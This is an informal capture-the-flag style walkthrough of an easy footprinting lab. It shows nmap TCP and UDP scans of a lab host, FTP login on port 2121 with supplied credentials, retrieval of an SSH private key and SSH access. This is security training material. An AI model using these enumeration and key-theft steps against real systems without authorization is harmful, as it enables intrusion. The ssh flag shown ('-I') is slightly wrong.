Footprinting Lab - Easy
We were commissioned by the company Inlanefreight Ltd to test three different servers in their internal network. The company uses many different services, and the IT security department felt that a penetration test was necessary to gain insight into their overall security posture.
The first server is an internal DNS server that needs to be investigated. In particular, our client wants to know what information we can get out of these services and how this information could be used against its infrastructure. Our goal is to gather as much information as possible about the server and find ways to use that information against the company. However, our client has made it clear that it is forbidden to attack the services aggressively using exploits, as these services are in production.
Additionally, our teammates have found the following credentials "ceil:qwer1234", and they pointed out that some of the company's employees were talking about SSH keys on a forum.
The administrators have stored a flag.txt file on this server to track our progress and measure success. Fully enumerate the target and submit the contents of this file as proof.
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
Frist, i perform a quick scanner via TCP to identify all opens ports -->
nmap -p- --open -sS 10.129.42.195 -Pn -n
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftpNow, see his versions and other things...
nmap -p 21,22,53,2121 -sCV 10.129.42.195 -Pn -n
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.42.195]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.42.195]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
Another thing we can perform, there is a UDP scan -->
nmap --top-ports 5000 --open -sU 10.129.42.195 -Pn -n --min-rate 1000
PORT STATE SERVICE
53/udp open domain
623/udp open asf-rmcpNote: I already looked the anonymous ftp
So... We have credentials, now try to log in via ftp access -->
Into the port 21, we havent anything, so... exist another port, there is 2121, try to login -->
We can see a .ssh folder, perharps we can optain the id_rsa -->
Nice, after download it, set the necessary permissions with chmod and connect with user ceil -->
chmod 600 id_rsa
ssh ceil@10.129.42.195 -I id_rsa
Last updated